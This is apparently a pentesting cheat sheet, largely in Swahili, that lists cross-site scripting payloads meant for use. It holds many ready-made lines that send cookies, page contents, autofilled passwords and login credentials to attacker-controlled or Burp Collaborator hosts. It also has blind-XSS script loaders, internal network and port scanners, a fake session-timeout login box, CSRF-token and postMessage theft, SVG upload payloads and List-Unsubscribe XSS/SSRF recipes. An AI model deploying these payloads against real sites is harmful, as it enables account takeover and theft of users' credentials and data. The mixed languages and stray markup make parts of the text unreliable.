XSS payloads za kawaida

payloads kadhaa ndani ya 1

Steal Info JS

Iframe Trap

Fanya mtumiaji avinjari kwenye ukurasa bila kutoka kwenye iframe na uibe vitendo vyake (ikijumuisha taarifa zinazotumwa katika fomu):

Iframe Traps

Kupata Cookies

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

Tip

Wewe hutaweza kupata cookies kutoka kwa JavaScript ikiwa HTTPOnly flag imewekwa kwenye cookie. Lakini hapa una some ways to bypass this protection ikiwa una bahati ya kutosha.

Kuiba Maudhui ya Ukurasa

var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)

Tafuta IP za ndani

<script>
var q = []
var collaboratorURL =
"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
var wait = 2000
var n_threads = 51

// Prepare the fetchUrl functions to access all the possible
for (i = 1; i <= 255; i++) {
q.push(
(function (url) {
return function () {
fetchUrl(url, wait)
}
})("http://192.168.0." + i + ":8080")
)
}

// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for (i = 1; i <= n_threads; i++) {
if (q.length) q.shift()()
}

function fetchUrl(url, wait) {
console.log(url)
var controller = new AbortController(),
signal = controller.signal
fetch(url, { signal })
.then((r) =>
r.text().then((text) => {
location =
collaboratorURL +
"?ip=" +
url.replace(/^http:\/\//, "") +
"&code=" +
encodeURIComponent(text) +
"&" +
Date.now()
})
)
.catch((e) => {
if (!String(e).includes("The user aborted a request") && q.length) {
q.shift()()
}
})

setTimeout((x) => {
controller.abort()
if (q.length) {
q.shift()()
}
}, wait)
}
</script>

Port Scanner (fetch)

const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }

Port Scanner (websockets)

var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}

Muda mfupi unaonyesha port inayojibu Muda mrefu unaonyesha hakuna majibu.

Pitia orodha ya ports zilizozuiwa katika Chrome here na katika Firefox here.

Sanduku la kuomba credentials

<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

Kunasa nywila za kujaza kiotomatiki

<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

Wakati data yoyote ikiingizwa kwenye password field, username na password hutumwa kwa attackers server; hata kama client atachagua saved password na haandiki chochote, credentials zitatolewa (ex-filtrated).

Hijack form handlers to exfiltrate credentials (const shadowing)

Ikiwa handler muhimu (mfano, function DoLogin(){...}) imetangazwa baadaye kwenye ukurasa, na payload yako inakimbia mapema (mfano, via an inline JS-in-JS sink), fafanua const yenye jina lile kwanza ili kuzuia na kufunga handler. Later function declarations cannot rebind a const name, leaving your hook in control:

const DoLogin = () => {
const pwd  = Trim(FormInput.InputPassword.value);
const user = Trim(FormInput.InputUtente.value);
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));
};

Notes

• Hii inategemea mpangilio wa utekelezaji: injection yako lazima itekelezwe kabla ya deklarashi halali.
• Ikiwa payload yako imefungwa ndani ya eval(...), const/let bindings hazitakuwa globals. Tumia mbinu ya dynamic <script> injection kutoka kwenye sehemu “Deliverable payloads with eval(atob()) and scope nuances” ili kuhakikisha binding ya kweli ya global isiyoweza kurebind.
• Wakati keyword filters zinazuia code, changanya na Unicode-escaped identifiers au utoaji wa eval(atob('...')), kama ilivyosemwa hapo juu.

Keylogger

Nilipotafuta kwenye github nilipata kadhaa tofauti:

• https://github.com/JohnHoder/Javascript-Keylogger
• https://github.com/rajeshmajumdar/keylogger
• https://github.com/hakanonymos/JavascriptKeylogger
• Unaweza pia kutumia metasploit http_javascript_keylogger

Kuiba CSRF tokens

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

Kuiba ujumbe za PostMessage

<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
</script>

PostMessage-origin script loaders (opener-gated)

Ikiwa ukurasa unahifadhi event.origin kutoka kwa postMessage na baadaye kuunganisha hilo kwenye URL ya script, mtumaji anadhibiti origin ya JS iliyopakiwa:

window.addEventListener('message', (event) => {
if (event.data.msg_type === 'IWL_BOOTSTRAP') {
localStorage.setItem('CFG', {host: event.origin, pixelID: event.data.pixel_id});
startIWL(); // later loads `${host}/sdk/${pixelID}/iwl.js`
}
});

Exploitation recipe (from CAPIG):

• Gates: huanzishwa tu wakati window.opener inapatikana na pixel_id iko kwenye allowlist; origin haikaguliwi kamwe.
• Use CSP-allowed origin: pivot to a domain already permitted by the victim CSP (e.g., logged-out help pages allowing analytics like *.THIRD-PARTY.com) and host /sdk/<pixel_id>/iwl.js there via takeover/XSS/upload.
• Restore opener: in Android WebView, window.name='x'; window.open(target,'x') hufanya ukurasa kuwa opener wake mwenyewe; tuma postMessage hasidi kutoka iframe iliyotekwa.
• Trigger: the iframe posts {msg_type:'IWL_BOOTSTRAP', pixel_id:<allowed>}; the parent then loads attacker iwl.js from the CSP-allowed origin and runs it.

This turns origin-less postMessage validation into a remote script loader primitive that survives CSP if you can land on any origin already allowed by the policy.

Supply-chain stored XSS via backend JS concatenation

When a backend builds a shared SDK by concatenating JS strings with user-controlled values, any quote/structure breaker can inject script that is served to every consumer:

• Example pattern (Meta CAPIG): server appends cbq.config.set("<pixel>","IWLParameters",{params: <user JSON>}); directly into capig-events.js.
• Injecting ' or "]} closes the literal/object and adds attacker JS, creating stored XSS in the distributed SDK for every site that loads it (first-party and third-party).

Stored XSS in generated reports when escaping is disabled

If uploaded files are parsed and their metadata is printed into HTML reports with escaping disabled (|safe, custom renderers), that metadata is a stored XSS sink. Example flow:

xmlhost = data.getAttribute(f'{ns}:host')
ret_list.append(('dialer_code_found', (xmlhost,), ()))
'title': a_template['title'] % t_name  # %s fed by xmlhost

Template ya Django inaonyesha {{item|key:"title"|safe}}, hivyo HTML ya mshambuliaji inatekelezwa.

Exploit: weka entity-encoded HTML katika sehemu yoyote ya manifest/config ambayo inafikia ripoti:

<data android:scheme="android_secret_code"
android:host="&lt;img src=x onerror=alert(document.domain)&gt;"/>

Imeonyeshwa kwa |safe, ripoti inaonyesha <img ...> na inasababisha JS kutekelezwa wakati wa kuangalia.

Uchunguzi: angalia report/notification builders zinazotumia tena parsed fields katika %s/f-strings na kuzima auto-escape. Tag moja iliyofichwa kwa encoding katika manifest/log/archive iliyopakuliwa inadumu kama XSS kwa kila mtazamaji.

Abusing Service Workers

Abusing Service Workers

Accessing Shadow DOM

Shadow DOM

Polyglots

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt

Blind XSS payloads

Unaweza pia kutumia: https://xsshunter.com/

"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>

<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>

<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">

<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>

<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>

<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>

<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>

<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

<!-- Payloads from https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide -->
<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>

<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))

<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>

<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />

<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />

<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}

Regex - Kupata Yaliyofichwa

Kutoka kwa this writeup inawezekana kujifunza kwamba hata ikiwa baadhi ya thamani zinafifia kutoka JS, bado inawezekana kuzipata katika JS attributes katika objects tofauti. Kwa mfano, input ya REGEX bado inawezekana kuipata hata baada ya thamani ya input ya regex kuondolewa:

// Do regex with flag
flag = "CTF{FLAG}"
re = /./g
re.test(flag)

// Remove flag value, nobody will be able to get it, right?
flag = ""

// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(
document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
)

Brute-Force List

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt

XSS Kutumia vibaya udhaifu nyingine

XSS katika Markdown

Je, unaweza kuingiza msimbo wa Markdown utakaoonyeshwa? Labda unaweza kupata XSS! Angalia:

XSS in Markdown

XSS to SSRF

Je, umepata XSS kwenye tovuti inayotumia caching? Jaribu kuiboresha hadi SSRF kupitia Edge Side Include Injection kwa payload hii:

<esi:include src="http://yoursite.com/capture" />

Tumia hii kupitisha vizuizi vya cookie, vichujio vya XSS na mengi zaidi!
More information about this technique here: XSLT.

XSS in dynamic created PDF

Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia input inayodhibitiwa na mtumiaji, unaweza kujaribu kumdanganya bot anayekuwa akiunda PDF ili kutekeleza kodhi yoyote ya JS.
Hivyo, ikiwa PDF creator bot itapata aina fulani ya HTML tags, itayatafsiri, na unaweza kutumiza mabaya tabia hii kusababisha Server XSS.

Server Side XSS (Dynamic PDF)

Ikiwa huwezi kuingiza HTML tags inaweza kuwa vyema kujaribu kuingiza PDF data:

PDF Injection

XSS in Amp4Email

AMP, iliyolenga kuharakisha utendaji wa ukurasa wa wavuti kwenye vifaa vya rununu, inajumuisha HTML tags zilizoambatanishwa na JavaScript ili kuhakikisha utendakazi ikilenga kasi na usalama. Inaunga mkono safu ya components kwa vipengele mbalimbali, vinavyopatikana kupitia AMP components.

The AMP for Email format extends specific AMP components to emails, enabling recipients to interact with content directly within their emails.

Example writeup XSS in Amp4Email in Gmail.

List-Unsubscribe Header Abuse (Webmail XSS & SSRF)

The RFC 2369 List-Unsubscribe header embeds attacker-controlled URIs that many webmail and mail clients automatically convert into “Unsubscribe” buttons. When those URIs are rendered or fetched without validation, the header becomes an injection point for both stored XSS (if the unsubscribe link is placed in the DOM) and SSRF (if the server performs the unsubscribe request on behalf of the user).

Stored XSS via javascript: URIs

1. Send yourself an email where the header points to a javascript: URI while keeping the rest of the message benign so that spam filters do not drop it.
2. Ensure the UI renders the value (many clients show it in a “List Info” pane) and check whether the resulting <a> tag inherits attacker-controlled attributes such as href or target.
3. Trigger execution (e.g., CTRL+click, middle-click, or “open in new tab”) when the link uses target="_blank"; browsers will evaluate the supplied JavaScript in the origin of the webmail application.
4. Observe the stored-XSS primitive: the payload persists with the email and only requires a click to execute.

List-Unsubscribe: <javascript://attacker.tld/%0aconfirm(document.domain)>
List-Unsubscribe-Post: List-Unsubscribe=One-Click

Bayti ya newline (%0a) katika URI inaonyesha kwamba hata herufi na alama zisizo za kawaida zinadumu kupitia rendering pipeline kwenye wateja walio na udhaifu kama Horde IMP H5, ambao watatoa kamba hiyo kama ilivyo ndani ya tagi ya anchor.

</details>

#### Proxies za kuacha usajili upande wa server -> SSRF

Baadhi ya clients, kama Nextcloud Mail app, hupitisha kitendo cha unsubscribe upande wa server: kubofya kitufe hufanya server ifanye fetch ya URL iliyotolewa yenyewe. Hii inageuza header kuwa primitive ya SSRF, hasa wakati wasimamizi wameset `'allow_local_remote_servers' => true` (imeandikwa katika [HackerOne report 2902856](https://hackerone.com/reports/2902856)), ambayo inaruhusu maombi kuelekea loopback na range za RFC1918.

1. **Tengeneza barua pepe** ambapo `List-Unsubscribe` inalenga endpoint inayodhibitiwa na mshambuliaji (kwa blind SSRF tumia Burp Collaborator / OAST).
2. **Weka `List-Unsubscribe-Post: List-Unsubscribe=One-Click`** ili UI ionyeshe kitufe cha kuacha usajili kwa bonyeza moja.
3. **Timizia mahitaji ya uaminifu**: Nextcloud, kwa mfano, hufanya tu ombi za HTTPS unsubscribe wakati ujumbe unapopita DKIM, kwa hiyo mshambuliaji lazima asayinishe barua pepe kwa kutumia kikoa wanachodhibiti.
4. **Tuma ujumbe kwa sanduku la barua linalosindika na server lengwa** na subiri hadi mtumiaji abofye kitufe cha kuacha usajili.
5. **Angalia callback upande wa server** kwenye collaborator endpoint, kisha pivot kwenda anwani za ndani mara primitive inapotathibitishwa.
```text
List-Unsubscribe: <http://abcdef.oastify.com>
List-Unsubscribe-Post: List-Unsubscribe=One-Click

</details>

**Vidokezo vya upimaji**

- Tumia OAST endpoint kukusanya blind SSRF hits, kisha rekebisha URL ya `List-Unsubscribe` ili kulenga `http://127.0.0.1:PORT`, metadata services, au host za ndani nyingine mara mbinu hiyo itakapothibitishwa.
- Kwa sababu unsubscribe helper mara nyingi inareuse HTTP stack ile ile kama application, unamrithi proxy settings, HTTP verbs, na header rewrites, na hivyo kuruhusu mbinu zaidi za traversal zilizobainishwa katika [SSRF methodology](../ssrf-server-side-request-forgery/README.md).

### XSS kupakia faili (svg)

Pakia kama picha faili kama ifuatayo (kutoka [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
```html
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>

<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>

<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>

<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />